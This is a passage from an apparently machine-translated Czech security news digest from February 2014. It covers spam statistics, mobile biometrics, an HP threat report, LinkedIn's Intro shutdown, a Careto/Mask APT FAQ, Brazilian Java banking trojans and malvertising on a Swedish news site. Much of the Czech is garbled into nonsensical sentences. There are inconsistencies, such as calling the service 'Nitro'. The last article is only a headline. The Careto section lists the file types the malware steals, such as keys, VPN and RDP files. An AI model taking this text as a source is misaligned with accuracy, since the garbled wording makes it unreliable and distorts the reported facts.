svědek, a musí být umožněno do Německa pro tento účel a musí být zaručeno, že nebude deportován do USA.


USA stále globální spam král
11.2.2014 Spam
SophosLabs odhalil Dirty Dozen top spam-předávání národy, neboť zveřejnila závěrečnou "Spampionship" ligovou tabulku roce 2013. Opět, je to USA, který získal lize je první místo, generování 14,5 procenta z celkového objemu nevyžádané pošty odeslané v průběhu posledního čtvrtletí roku, což je čistou sérii špičkových povrchových úprav pro rok 2013. Nicméně, rozdíl na druhé místo zúžil, přičemž Čína re-objevující se jako hlavní aktér v rozesílání spamu Dirty Dozen, vyskočil z 4,6 procenta na 8,2 procenta, zatímco podíl Ruska spam mírně zvýšil z 3,0 procenta ve 3. čtvrtletí na 5,5 procenta ve 4. čtvrtletí.

"Nejviditelnější zprávy z grafů Tucet špinavců je, že problém zombified počítačů chrlí spam je skutečně globální," říká Sophos senior bezpečnostní analytik, Paul Ducklin. "Každý region na světě je silně zastoupena, s výjimkou Afriky . " Spammeři neposílají spam se: používají botnety, nebo ""., počítačů, malware-infikovaných distribuovat jejich spam pro ně, téměř vždy bez majitelů infikované počítače jsou si vědomi zombie armády "Ve většině případů, země Dirty Dozen dělal to do seznamu, protože statisticky významný podíl jejich obyvatel se provádí on-line podnikání pomocí počítačů, které jsou aktivně infikované dálkového ovládání malware, "říká Ducklin." Tak spam aspekt je jen symptom - začátek problému. Zombie malware znamená, že podvodníci jsou již na vnitřní straně. Záleží jen na vás, trávník je ven. " Pokud jde o tabulky Spampionship zemí spam, předávání podle počtu obyvatel, čísla ukazují průměrnou "spamminess" na osobu ve srovnání s USA. Výsledky ukazují věci, které zůstaly docela stabilní, protože Bělorusko udržel první místo, s průměrným počítačem tam více než 10 krát větší pravděpodobnost k rozesílání nevyžádané pošty, než kdyby to bylo v USA. Zatím jiných zemích, jako je Uruguay, na Tchaj-wanu, Lucembursko a Makedonie i nadále žokej na pozici 12 v horní. Jediný významný krok přišel z Kuvajtu, se čísla znázorňující, že byl téměř trojnásobný nárůst nevyžádané pošty-přeložka na obyvatele, roste z 2,1 násobku na obrázku v USA na obyvatele, na 6,07, povýšit ho na druhé místo v tabulce. V Spampionship ligové tabulky nejsou určeny k naznačují, že jednotlivé národy jsou aktivně zapojeni do nelegální rozesílání spamu, ale jsou navrženy tak, aby zvýšení povědomí o kolik počítačů jsou potenciálně infikovány spamu, předávání malware. "Pokud vaše země není v Dirty Dozen, je to snadné cítit samolibě, nebo alespoň na vavřínech, "říká Ducklin." Nedělej to: pokud jste spam odesílatel, Tucet špinavců nebo ne, jste čistý pozitivní přispěvatelem počítačové trestné činnosti ".


Do roku 2016 bude 30% organizací používá biometrické ověřování na mobilních zařízeních
11.2.2014 Biometrika
Konzumerizace IT a obchodních BYOD programy mají za následek potenciální bezpečnostní problémy pro vedoucí IT podle společnosti Gartner. Očekávání uživatelů mobilních uživatelů čisté a jednoduché zkušeností často převáží obavy o bezpečnost, a stejná cenná data hlídané složitých hesel a bezpečnostních opatření na PC může být ponecháno zranitelný na mobilních zařízeních. Gartner předpovídá, že do roku 2016, 30 procent organizací se bude používat biometrické ověřování na mobilních zařízeních, a to až z pěti procent dnes. "Mobilní uživatelé spolehlivě odolávají metody ověřování, které byly snesitelné na PC a jsou stále potřebné pro posílení bezpečný přístup na mobilních zařízeních," řekl Ant Allan, viceprezident výzkumu ve společnosti Gartner. "Vůdci Bezpečnostní musí řídit očekávání uživatelů a vzít v úvahu zkušenosti uživatelů, aniž by zahrnující bezpečnost." Gartner označila některé potenciální dopady zabezpečení na konzumerizace IT, a učinil několik doporučení pro vedoucí bezpečnosti IT. Uživatelská zkušenost vítězí bezpečnostní obavy Zatímco většina organizace vyžadují robustní hesla na notebooky, smartphony a tablet zařízení často mají přístup ke stejným aplikacím a kritických dat, ale ne stejné úrovně bezpečnosti. Zvýšený počet přístrojů ve hře také zhoršuje vystavení důležitých informací. Implementace standardních Power-On Password politiky je mnohem složitější o přijetí BYOD praktik, s nevyhnutelným střetem přes uživatelských práv a soukromí. Zatímco komplexní hesla může být problematické zejména pro uživatele, zadejte na mobilních zařízeních, pokud tato zařízení konání firemních dat nebo poskytují přístup k podnikovým systémům, jako je e-mail bez dalšího přihlášení, dokonce i výchozí čtyřmístné heslo je nevhodné. Nicméně, podpora pro robustnější ověřování po zapnutí, je nerovnoměrný, jen s několika mobilních operačních systémů a zařízení podporujících biometrické autentizace. I v případech, které nabízejí tuto podporu, může implementace nemůže být dost dobré pro obchodní použití. "osmimístné číselné heslo bude vyžadovat hodiny k vybrání, a že odradí příležitostné hackery pomocí sady nástrojů," řekl John Girard, viceprezident a Rozlišují analytik společnosti Gartner. "Nicméně, dokonce i šest znaků malá alfanumerické heslo může poskytnout miliardy hodnot. Pro ​​většinu praktických účelů, hackeři nejsou připraveni pokračovat v tomto velkou sadu kombinací vzhledem k relativně pomalé rychlosti se podílejí na hrubou silou útoků proti smartphony a tablety. " Gartner doporučuje, aby politika heslo vyžadující použití nejméně šesti alfanumerických znaků, a zakazuje se slovům ze slovníků, je vynucena na zařízeních s přístupem k firemním informacím prostřednictvím mobilního správu zařízení (MDM) nástroje. tlustou čáru za minulostí Některé organizace se pokusí čelit rizikům ze ztraceného nebo odcizeného zařízení od provádění kontrol, že vymazání zařízení po omezeném počtu nesprávných zadání hesla, nebo pomocí vzdáleného příkazu. "Tato praxe není zcela zmírnění rizika, protože je téměř nemožné přepsat solid-state pamětí," řekl pan Girard. "Nejlepší je použít šifrování, která není vázána na ověření primární energie-na, což znamená, že klíč není možné obnovit ze zařízení poté, co byla provedena měkký otřete operace." Kromě toho, Gartner doporučuje, aby další způsob ověřování - minimálně další heslo - by měly být použity pro přístup k citlivým podnikovým aplikacím a datům. Tímto způsobem, i když hacker poruší zapnutí obrany, každá další aplikace nebo ukládat dat představuje další výzvu, která bude společně, přítomný příliš překážku, aby se vyplatilo. V některých případech, ověřování vyšší jistota je nutné. V PC (tradičně), samostatné zařízení, může být použit k poskytnutí hardwarový token, který by mohl být použit pro dodatečné ověření. "Tradiční ověřování tohoto druhu je často odmítnuty v případě mobilního použití, kvůli špatné uživatelské zkušenosti s mnoha druhy hardwarových tokenů," řekl pan Allan. "Žonglování token v jedné ruce, telefon v druhé a latte ve třetí je stále vzdoroval uživatelů mobilních zařízení." Softwarové tokeny, např. X.509 pověření na koncový bod, poskytuje možnosti v tomto případě, ale často potřebují MDM nástroje, které mají být správně a stále realizované vyžadovat dodatečné kontroly poskytnout autentizaci vyšší zajištění nezbytné v některých organizacích. Biometrické možnosti nabídnout kompromis Gartner doporučuje, aby vedoucí bezpečnostní hodnotit biometrických metod autentizace, kde je vyžadována autentizace vyšší jistotu. Vhodné režimy ověřování patří rozhraní interaktivitu, rozpoznávání hlasu, obličeje topografii a duhovky strukturu. Tyto režimy mohou být použity ve spojení s heslem, které umožňuje ověření vyšší zajištění bez nutnosti jakékoliv významné změny v chování uživatele. Kromě toho, jako mobilní zařízení, sama o sobě poskytuje bohatý uzel identity relevantní kontextových dat, tyto informace mohou být také použity pro zvýšení důvěra v reklamované identity. Je možné, že kombinace pasivní biometrické autentizace a kontextuální ověřování bude poskytovat dostatečnou záruku ve scénáři se středním rizikem bez nutnosti "brány" pro ověření události pomocí hesel nebo tokenů. To je také důležité při plánování komplexní politiku ověřování, která zahrnuje mobilní zařízení, aby zvážila zátěž organizací a uživatelů podobně, takže politika je udržitelná. "Přijetí významně různé metody ověřování pro různá zařízení bude nakonec neudržitelné," řekl pan Allan, "Mobile-apt metody ověřování musí být také PC apt. Kombinace X.509 pověření na koncový bod, nízkým třením biometrických režimů a kontextuální ověřování bude pravděpodobně slušet. "


Akreditace Program posiluje bezpečnost globálního dodavatelského řetězce
11.2.2014 IT

The Open Group zahájila Open Trusted Technology Provider Standardní ( O-TTPS ) Akreditace Program, jehož cílem je zajistit integritu komerční off-the-shelf (COTS) informačních a komunikačních technologií (ICT) výrobky po celém světě a ochrany globálního dodavatelského řetězce proti počítačové kriminalitě . útoky , jejichž cílem je zajistit integritu ve vývoji technologií a aby se zabránilo nebezpečným poskvrněné a padělaných přípravků do dodavatelského řetězce, bude akreditace programu zajistí žadatelé v souladu s normou O-TTPS. Firmy hledají O-TTPS Akreditace - což by mohlo být dodavatelé součástí, poskytovatelé technologií nebo integrátor - můžete si vybrat, které mají být akreditovány pro odpovídající normě O-TTPS a dodržování požadavků osvědčených postupů v rámci celého podniku, a to v konkrétní produktové řady nebo obchodní jednotky nebo v jedné nebo více jednotlivých produktů. Organizace zažádá O-TTPS akreditované jsou pak povinni poskytnout důkazy o shodě pro každý z požadavků na O-TTPS, prokázat, že mají zavedeny postupy k zajištění jejich in-house vývoj a jejich dodavatelské řetězce v rámci celého životního cyklu produktu COTS informačních a komunikačních technologií, včetně návrhu , fáze sourcing, stavět, naplnění, distribuce, podporou perspektivních a likvidace. O-TTPS akreditovaných organizací pak budou moci poznat sebe jako otevřených důvěryhodných technologií poskytovatelů a stanou se součástí veřejného rejstříku důvěryhodných poskytovatelů, kteří pomáhají zajistit, že "Postav se Integrita ", aby jejich zákazníci mohou" koupit s jistotou ". The Open Group je rovněž oznamuje O-TTPS rozpoznaného hodnotitel program, který zajistí, že Uznávané posuzovatel (firem) splňovat určitá kritéria jako třetí osoba hodnotitele organizace a že jejich posuzovatelé (fyzické osoby) splňují další sadu kritérií a složili zkoušku O-TTPS hodnotitelem, před tím, než mohou být přiřazeny k O-TTPS hodnocení. The Open Group bude fungovat tento program, udělit O-TTPS uznávaná osvědčení posuzovatele a seznam těchto kvalifikačních organizace na veřejného registru.


Top bezpečnostní firmě hrozby, které
11.2.2014 Bezpečnost

Nová zpráva od společnosti HP poskytuje hloubkovou analýzu dat a kolem nejpalčivějších bezpečnostních problémů trápí podniky. Podrobně faktory, které nejvíce přispěly k rostoucí útoku povrch v roce 2013, zvýšené závislosti na mobilních zařízeních, šíření nejisté softwaru a rostoucím využíváním doporučení Java a nastiňuje pro organizace minimalizovat bezpečnostní rizika a celkový dopad útoků.

"Protivníci jsou dnes více než kdy jindy adept a spolupracují efektivněji využít zranitelnosti v celém neustále se rozšiřující útoku," řekl Jacob West, technický ředitel, Enterprise Security Products, HP. "Průmysl musí spolčit se aktivně sdílet bezpečnostní informace a taktiky, aby se nenarušila škodlivé aktivity poháněné rostoucí podzemní trhu." Zatímco výzkum zranitelnost pokračoval získat pozornost, celkový počet veřejně známé chyby zabezpečení se snížila o 6 procent ročně po roce, a množství vysoce rizikových zranitelností klesaly čtvrtý rok po sobě, snížení o 9 procent. I když nelze vyčíslit, pokles může být údaj jako k nárůstu zranitelnosti, které nejsou veřejně zveřejněny, ale doručeným na černém trhu pro soukromé a / nebo zločinný spotřeby. Téměř 80 procent žádostí hodnocených obsahovala zranitelnosti zakořeněné mimo jejich zdrojový kód. Dokonce i odborně kódované software může být nebezpečně zranitelná, pokud chybně nakonfigurován. rozporné a různé definice malware analýzy komplikovat rizik. Při zkoumání více než 500.000 mobilních aplikací pro Android, HP nalézt významné rozdíly mezi tím, jak antivirů a mobilní prodejci platformy klasifikaci malware. Čtyřicet šest procent mobilních aplikací studovaných šifrování použití nesprávně. Výzkum HP ukazuje, že mobilní vývojáři se často nedaří používat šifrování při ukládání citlivých dat na mobilních zařízeních, se spoléhat na slabých algoritmů, aby tak učinily, nebo zneužívat silnější šifrovací schopnosti, které je činí neefektivní. Internet Explorer je software, nejvíce zaměřen Initiative HP Zero Day ( Vědci ZDI) zranitelnosti v roce 2013, a představoval více než 50 procent zranitelností získaných v rámci programu. Tato pozornost je výsledkem tržních sil zaměřených výzkumných pracovníků na Microsoft zranitelnosti a neodráží na celkovém zabezpečení aplikace Internet Explorer. Sandbox bypass zranitelnosti byly nejčastější a škodlivé pro uživatele Java. Protivníci výrazně eskaloval jejich využívání Java současným zaměřením více známých (a nula den) zranitelnosti v kombinovaných útoků ohrozit specifické cíle zájmu. Klíčové doporučení:

V dnešním světě rostoucích kybernetických útoků a rostoucími nároky na bezpečný software, je nutné eliminovat příležitosti k nechtěnému odhalení informací, které mohou být prospěšné pro útočníky.
Organizace a vývojářům musí zůstat vědomý bezpečnostních úskalí v rámcích a jiný kód třetí strany, zejména pro hybridní vývojových platforem mobilních. Robustní bezpečnostní směrnice musí být přijaty k ochraně integrity aplikací a soukromí uživatelů.
I když je možné odstranit útoku, aniž by byla obětována funkčnost, kombinaci těch správných lidí, procesů a technologií má umožnit organizacím efektivně minimalizovat zranitelnost, které ji obklopují, a výrazně snížit celkové riziko.
Spolupráce a hrozba sdílení zpravodajských informací mezi bezpečnostním průmyslu pomáhá získat vhled do taktiky protivníka, což umožňuje více proaktivní obranu, posílení ochrany nabízené v bezpečnostních řešení, a celkově bezpečnější prostředí.
Kompletní zpráva od společnosti HP je k dispozici zde (nutná registrace).


LinkedIn ukončuje službu Intro

11.2.2014 Sociální sítě
Profesionální sociální síť ukončuje provoz své nedávno spuštěné mobilní služby Intro, která byla určena k tomu, aby spojovala lidi přes email, ale kterou experti kritizovali kvůli bezpečnosti.

LinkedIn spustil Intro v říjnu minulého roku v rámci své strategie „mobilní služby na prvním místě“. Služba byla určena pro iPhone a byla navržena tak, aby „vzala“ informace z profilu uživatele a vložila je do odeslaných e-mailů. Služba zobrazila informace příjemci tehdy, pokud měl odesílatel i příjemce účet na LinkedIn. Účelem Intra mělo být to, aby e-maily získaly profesionálnější rozměr a přivedly na LinkedIn více uživatelů.

Krátce po spuštění služby však bezpečnostní experti začali zpochybňovat, způsob, jakým služba zpracovává e-maily na serverech LinkedIn. Konzultantská společnost Bishop Fox uvedla, že služba je jako stvořená pro útoky kyberzločinců a je jen otázkou času, než ji někdo zneužije k phishingovému útoku.

LinkedIn ve svém pátečním oznámení o uzavření služby neuvedl, zda byla důvodem bezpečnost. Podle společnosti rozhodnutí padlo kvůli „zaměření firmy“. „Děláme velké dlouhodobé investice, kdy se soustředíme na pouze několik věcí. Abychom zajistili jejich úspěch, musíme se věnovat méně věcem,“ napsal první viceprezident pro produkty Deep Nishar.

Nitro bude ukončeno 7. března. LinkedIn neuvedl, co udělá s emailovými daty uživatelů, která se ukládala na jeho serverech. Společnost se zatím odmítla k této otázce vyjádřit. Podle Bishop Fox je nepravděpodobné, že LinkedIn ukončuje svou službu pouze z bezpečnostních důvodů. „Technologické produkty v dnešní době přicházejí a zase odcházejí a řada z nich má krátkou životnost,“ uvedl partner společnosti Vincent Liu.

„Avšak tato epizoda je jasným příkladem toho, proč je důležité dbát na soukromí a bezpečnost, a to i na mobilních zařízeních,“ dodal Liu. LinkedIn také uvedl, že bude rušit i další služby. Slidecast, jenž lidem umožňuje nahrávat digitální prezentace s audiem, končí 30. dubna a podpora aplikace LinkedIn pro iPad pro verze iOS starší než 6.0 končí 18. února.


V Careto / Mask APT: Často kladené otázky
10.2.2014 APT

Co přesně je Careto / "The Mask"?
Maska je moderní hrozba herec, který byl zapojen do cyber-špionážních operací nejméně od roku 2007.

Co dělá maska ​​zvláštní, je složitost sady nástrojů používaných útočníky. To zahrnuje velmi sofistikovaný kus malware, rootkit, je bootkit, Mac OS X a Linux verze a případně i verze pro Android a iPad / iPhone (iOS).

Maska také používá vlastní útok proti starší produkty společnosti Kaspersky Lab, aby bylo možné skrýt v systému. To staví ji nad Duqu z hlediska propracovanosti, aby masku jeden z nejmodernějších hrozeb v současné době. Tento a několik dalších faktorů, aby nám věří, že toto by mohlo být státem sponzorované provoz.

Proč to volat maska?
Název "Mask" pochází ze španělského slangu slovo "Careto" ("Mask" nebo "Ugly Face"), které autoři obsažené v některých malware modulů.

=

Kdo jsou oběti? / Co můžete říci o cílech útoků?
Mezi hlavní cíle Careto spadají do následujících kategorií:

Vládní instituce
Diplomatické úřady a velvyslanectví
Energie, ropy a zemního plynu společnosti
Výzkumné instituce
Private equity firmy
Aktivisté
Víme, celkový počet obětí?
I když přesný počet obětí není znám, jsme pozorovali obětí na více než 1000 IP adres v 31 zemích. Infekce byly pozorovány v: Alžírsko, Argentina, Belgie, Bolívie, Brazílie, Čína, Kolumbie, Kostarika, Kuba, Egypt, Francie, Německo, Gibraltar, Guatemala, Íránu, Iráku, Libye, Malajsie, Mexiko, Maroko, Norsko, Pákistán , Polsko, Jižní Afrika, Španělsko, Švýcarsko, Tunisko, Turecko, Velká Británie, Spojené státy a Venezuela.

Na identifikační algoritmus jsme vyvinuli na základě, jsme napočítali více než 380 unikátních oběti mezi více než 1000 + IP.
 

Nicméně, vzhledem informace oběť byla shromážděna pouze pro některé rozkazech a kontrolních serverů a sinkholed hostitelů, může celkový počet postižených zemí a jedinečné obětí bude mnohem vyšší.

Co Careto dělat? Co se stane poté, co je cílový počítač je nakažený?
Pro oběti, infekce Careto je katastrofální. Malware zachytí všechny komunikační kanály a shromažďuje nejdůležitější informace z infikovaného systému. Detekce je velmi obtížné, protože stealth schopností rootkit. Kromě vestavěných funkcí, mohou provozovatelé Careto nahrát další moduly, které lze provést jakékoliv nebezpečný úkol. Vzhledem k povaze známých obětí, dopad je potenciálně velmi vysoká.

Jak se Careto infikovat počítače?
Maska kampaně jsme zjistili, spoléhá na e-maily, kopí-phishing s odkazy na nebezpečné webové stránky. Infikovaná stránka obsahuje řadu činů, jejichž cílem je infikovat návštěvníka, v závislosti na jeho konfiguraci systému. Po úspěšném infekce, infikovaná stránka přesměruje uživatele na benigní webové stránky odkazované v e-mailu, který může být film, YouTube nebo zpravodajský portál.

Je důležité si uvědomit, využívat webové stránky nejsou automaticky nakazit návštěvníky, místo toho, útočníci hostit využije při určitých složek na webových stránkách, které nejsou přímo odkazuje nikde, s výjimkou škodlivých e-mailů. Někdy, útočníci použít sub-domén na zneužití webových stránkách, aby se jim zdají být legitimní. Tyto sub-domény simulovat dílčí úseky hlavních novin ve Španělsku plus některé mezinárodní ty jako Guardian a Washington Post.

Jsou útočníci využívají všechny zero-day zranitelnost?
Zatím jsme zaznamenali útoky pomocí více vektorů. Patří mezi ně alespoň jedna aplikace Adobe Flash Player využití (CVE-2012-0773). Využití byla navržena pro Flash Player verze před 10.3 a 11.2.

CVE-2012-0773 byl původně objeven VUPEN a má zajímavý příběh. Jednalo se o první využití rozbít pískoviště Chrome a byl použit vyhrát soutěž CanSecWest Pwn2Own v roce 2012. Využít způsobil trochu kontroverzní, protože tým VUPEN odmítl prozradit, jak unikl pískoviště, prohlašovat, že oni byli plánuje prodat využít pro své zákazníky. Je možné, že herec Careto hrozba koupili tuto chybu z VUPEN. (Viz příběh o Ryan Naraine )

Jiné vektory používané patří sociální inženýrství, žádá uživatele, aby si stáhnout a spustit soubor JavaUpdate.jar nebo nainstalovat Chrome prohlížeče plugin. Máme podezření, že ostatní exploity existují také, ale my útočiště-t byl schopen je získat z útoku serveru.

Je to pouze pro systém Windows hrozba? Které verze systému Windows jsou určeny? Existují Mac OS X nebo Linux varianty?
Zatím jsme pozorovali trojské koně pro Microsoft Windows a Mac OS X. Některé využívat serverové cesty obsahuje moduly, které se zdají být navrženy tak, aby infikovat počítače Linux, ale dosud se nachází na Linux backdoor. Navíc, některé z C & C artefaktů (záznamy) naznačují, že také mohou existovat zadní vrátka pro Android a Apple iOS.

Viděli jste žádný důkaz o mobilní komponenty - iOS, Android nebo BlackBerry?
Máme podezření, iOS backdoor existuje, ale nebyli jsme schopni najít to ještě. Podezření je založeno na protokolu ladění z jednoho ze serverů C & C, pokud je zjištěno oběť v Argentině a přihlášeni jako uživatel s agenta na "Mozilla/5.0 (iPad; CPU OS 6_1_3 jako Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Mobile/10B329 ". Zdá se, že naznačují, že je iPad, i když bez vzorku, je těžké být jisti.

Kromě toho jsme také podezření na existenci Android implantátu. Tento je založen na jedinečném identifikátoru verze zaslané C & C, což je "AND1.0.0.0". Komunikace s tímto jedinečným identifikátorem byly pozorovány přes 3G spojení, což naznačuje možnou mobilní zařízení.

Jak se liší od jakéhokoli jiného APT útoku?
Co dělá maska ​​zvláštní, je složitost sady nástrojů používaných útočníky. To zahrnuje velmi sofistikovaný malware, rootkit, je bootkit, Mac a Linux verze a případně i verze pro Android a iPad / iPhone (Apple iOS).

Také maska ​​používá vlastní útok starších produktů Kaspersky aby skryl v systému. To staví ji nad Duqu z hlediska propracovanosti, aby masku jeden z nejmodernějších apts v současné době. Tento a několik dalších faktorů, aby nám věří, že toto by mohlo být státem sponzorované provoz.

Jak jste se dozvěděl o této hrozby? Kdo to hlásil?
Původně jsme si uvědomili Careto, když jsme pozorovali pokusy o zneužití zranitelnosti v našich produktech, aby se malware? Neviditelný? v systému.

Samozřejmě, že to zvedl náš zájem a náš výzkumný tým se rozhodl dále zkoumat. Jinými slovy, útočníci přitahuje naši pozornost tím, že se snaží využít produkty společnosti Kaspersky Lab.

Ačkoliv zranitelnosti v produktech byla objevena a pevná před pěti lety, je zde stále možnost, že existují uživatelé, kteří tam útočiště-t aktualizované produkt. V takových případech využívat může být stále aktivní, i když to nebude nám brání odstranění malware a čištění systému.

Existují rozmanité varianty Careto? Existují velké rozdíly ve variantách?
Careto je vysoce modulární systém, podporuje zásuvné moduly a konfiguračních souborů, které umožňují, aby provést velké množství funkcí.

Varianty Careto mají různé kompilace časová razítka sahající až do roku 2007. Většina modulů byly vytvořeny v roce 2012.

Je příkaz-a-řídicí server používaný Careto stále aktivní? Už jste byli schopni závrtu některý z C & Cs?
V současné době, všechny známé Careto C & C servery offline. Útočníci začali brát je v režimu offline v lednu 2014. Byli jsme také schopni závrtu několik C & C servery, které nám umožnily shromáždit statistické údaje o provozu.

Co přesně je ukraden z cílových strojů?
Malware shromažďuje velký seznam dokumentů z infikovaného systému, včetně šifrovacích klíčů, konfigurace VPN, SSH klíčů a RDP souborů. Existuje také několik neznámých rozšíření monitorováno, že jsme nebyli schopni identifikovat, a může souviset s vlastní vojenské / šifrovacích nástrojů na vládní úrovni.

Zde je úplný seznam nasbíraných souborů z konfigurací jsme analyzovaných:

*.AKF,*.ASC,*.AXX,*.CFD,*.CFE,*.CRT,*.DOC,*.DOCX,*.EML,*.ENC,*.GMG,*.GPG,*.HSE,*.KEY,
*.M15,*.M2F,*.M2O,*.M2R,*.MLS,*.OCFS,*.OCU,*.ODS,*.ODT,*.OVPN,*.P7C,*.P7M,*.P7Z,*.PAB,*.PDF,
*.PGP,*.PKR,*.PPK,*.PSW,*.PXL,*.RDP,*.RTF,*.SDC,*.SDW,*.SKR,*.SSH,*.SXC,*.SXW,*.VSD,
*.WAB,*.WPD,*.WPS,*.WRD,*.XLS,*.XLSX

Je to státem podporovaný útok?
Maska využívá vlastní útok proti starší produkty společnosti Kaspersky Lab, aby bylo možné skrýt v systému. Kromě toho, že obsahuje rootkit, je bootkit, verze Linux / Mac a možná i verze pro Apple iOS. To staví ji nad Duqu z hlediska propracovanosti, aby masku jeden z nejmodernějších apts v současné době.

Také jsme pozorovali velmi vysoký stupeň profesionality v provozních postupů skupiny v pozadí tohoto útoku, včetně sledování jejich infrastruktury, odstavení z provozu, aby se zabránilo zvědavýma očima pomocí přístupových pravidel, pomocí stírání namísto vymazání pro soubory žurnálu, atd. Tato úroveň provozní bezpečnosti není normální cybercriminal skupiny.

Tento a několik dalších faktorů, aby nám věří, že toto by mohlo být státem sponzorované kampaň.

Kdo je za to zodpovědný?
Uveďte je obtížný úkol. Na internetu, je velmi obtížné, aby se solidní připsání vzhledem k nestálé povaze způsobu, jakým byla postavena.

Některé stopy, jako například používání španělského jazyka jsou slabé, protože se mluví v mnoha zemích, včetně Latinské Ameriky, Mexika a Spojených státech (např. v Miami, kde existuje silná španělsky mluvící komunita).

Měli bychom také mít na paměti možnost pod falešnou vlajkou útoků před provedením jakékoli solidní předpoklad o totožnosti toho, kdo je odpovědný, aniž by velmi solidní důkaz.

Jak dlouho se útočníci byli aktivní?
Některé vzorky Careto byly sestaveny jako daleká záda jak 2007. Kampaň byla aktivní až do ledna 2014, ale v průběhu našeho šetření byly servery C & C vypnout.

To je nejméně pět let. Nemůžeme vyloučit možnost, že útočníci vzkřísit kampaň v určitém okamžiku v budoucnosti.

Věděli, že útočníci používají nějaké zajímavé / pokročilé technologie?
Backdoor Windows je velmi sofistikovaný, a útočníci používají řadu technik, aby se snažit, aby útok stealthier. Patří mezi ně injekci do systémových knihoven a pokouší se využít starší produkty společnosti Kaspersky Lab, aby se zabránilo odhalení.

Kromě toho, že využije pokrývají všechny potenciální cílové systémy, včetně Mac OS X a Linux. Také komunikace mezi různými využívají shell kódu modulů se provádí prostřednictvím cookies, což je docela neobvyklé techniky.

Má Kaspersky Lab detekovat všechny varianty tohoto malware?
Ano. Naše produkty detekovat a odstranit všechny známé verze malwaru používané útočníky. Jména detekce:

Trojan.Win32/Win64.Careto. *
Trojan.OSX.Careto
Existují Indikátory kompromisu (IOCs) na pomoc obětem identifikovat vniknutí?
Ano, MOV informace byly obsaženy v našem podrobném technickém výzkumu papíru.

Zde můžete přečíst naši plnou zprávu.


Šifrované Java Archive trojské bankéři z Brazílie
10.2.2014 Viry

Nikdy jsem si koupil PlayStation a nemá ani můj kolega Micha-san z Japonska - dobře, v jeho případě, alespoň ne z Brazílie. Nicméně, oba jsme obdrželi stejnou upozornění e-mailem:

V tomto případě se zločinci z Brazílie použil nový, ale velmi zvláštní techniku ​​- šíří trojské bankéřů přes Jar. soubory. Říkám divné, protože i když stačí kliknout na jar souboru, nebude fungovat, pokud jste typ ". java-jar filename.jar "v konzoli, ale to nezastavilo brazilské zločinci a dokonce podařilo spoof naše e-mail pasti v Japonsku! Pojďme se podívat do jedné takové Brazilský Java Archive bankéře. První detekce na VT 02.01.2014 13:18:57 0/50 Po rozbalení a demontáž, uvidíte kód šifrované pomocí rozvodny šifry. To je, jak kód vypadá, než to dešifrovat:

Rozvodna nicka rutina je vložen do kódu a to je příklad toho, jak to funguje:

Kompletní tabulka substituovaných znaků je toto:
Po dešifrování stejný kód vypadá takto:

Tento malý 14kB. Jar bankéř pracuje jako downloader a je detekován Kaspersky Anti-Virus, jak Trojan.Java.Agent.da

Jakmile se infikuje počítač oběti, vytváří falešný složku, Google Chrome, kam se ukládají nově stažený bankéře z uvedených URL. To také pošle informaci PC oběti na vzdálený server, který je již dole. Proč se zločinci z Brazílie nyní přešel od Delphi Java? Možná je to nová generace zločinci, kteří již dostávají třídy Delphi.


Největší webová stránka ve Švédsku Šíření škodlivého kódu
10.2.2014 Viry

Tento týden byl jeden z nejvíce hektických týdnů po velmi dlouhou dobu, byl jsem pracoval ve dne v noci až do konce vše pro Analyst summitu Kaspersky Security . Nebyl jsem v náladě pro novou práci, protože velmi pozdní a hektické noci. Jsem na cestě ven ze dveří klesat děti a manželku na rodiče místě a najednou zazvoní telefon, jeho Magnus Lindkvist, který byl Security Evangelist společnosti Microsoft ve Švédsku. Je vždy příjemné mluvit s Magnuse, ale tentokrát měl jiný tón, na jeho hlas, byl to opravdu jen pro jakékoliv chit chat, a jen se mě zeptal, jestli jsem byl blízko k počítači. Nálada na něco vzrušujícího najednou jsou jen vrátil ke mně! Byl jsem zpět do hry! :)

Jako bezpečnostní výzkumník, jsem vždy mít alespoň jeden počítač s operačním systémem 24/7, on mi říká, že největší internetové stránky ve Švédsku, Aftonbladet se šíří malware. Rychle jsem se spustit svůj virtuální stroj, spustit Chrome a otevřete webovou stránku. Nic se nestane ... Co jsem zmeškal? Byl Magnus srandu? Pak na druhé straně telefonu slyším Magnus řekl: "Musíte používat Internet Explorer".

Škodlivý reklama, která byla spuštěna v Aftonbladet měl také skript pro kontrolu prohlížeč, pravděpodobně se vyhnout falešné infekcí, a byla vyvolána pouze tehdy, když uživatel spustí aplikaci Internet Explorer. Při návštěvě Aftonbladet a používáte Internet Explorer, budete přesměrováni na jinou webovou stránku, hxxp :/ / [Cut]. Windowsdefence-sn.nl na této stránce statický obraz falešné varování z Microsoft Security Essentials, které mají detekovaných virů na vašem počítači, a je třeba ji opravit. Obraz je opravdu z nástroje Microsoft Security Essentials, ale něco, co se zlí hoši vytvořili vyděsit lidi, že jsou infikované. Jedná se o velmi časté techniky malware spisovatelů. Když kliknete na obrázek, nemusíte nic opravit, můžete skutečně stáhnout soubor škodlivý. Soubor byl popletl Visual Basic spustitelný a je stále předmětem analýzy nás.

Nejprve jsem se ptal sám sebe, je to opravdu důležité? Vzhledem k tomu, že škodlivý reklama byla velmi rychle odstraněna z Aftonbladet, že se nevyužívá žádné zranitelnosti, je to "jednoduché" pokus o sociální inženýrství. Ale myslím, že je to velmi zajímavý a důležitý příběh vyprávět. Většina uživatelů dnes mají dojem, že potřebují k návštěvě pochybné webové stránky nakazit, ale podívejte se na to, co se tady stalo, největší internetové stránky ve Švédsku se šíří malware, ne proto, že dostal hacknutý, ale proto, že někdo s největší pravděpodobností koupil nebo ohrožena reklamy běžící na internetových stránkách. Velké internetové stránky často obsahují obsah z jiných webových stránek, a pokud protivníci ohrozit některou z těchto internetových stránek mohou také manipulovat s obsahem, který je stále součástí velkým stránkách.

V době psaní Nevím přesně, co se škodlivý kód dělá, ale přesto chci všechny varovat o tom! Prosím, mějte svou ochranu až do data! Chci také podpořit Aftonbladet informovat své čtenáře, pokud některý z jejich stránek je infikováno a šíření škodlivého kódu, a ne jen tiše odstranit škodlivý reklamu. To by pomohlo hodně, protože im jistý, že existuje mnoho lidí tam venku, kteří žádají vlastního života, pokud jejich počítač je nakažený, a v případě, že infekce se stále děje.


Podvodníci míří na olympiádu
10.2.2014 Kriminalita

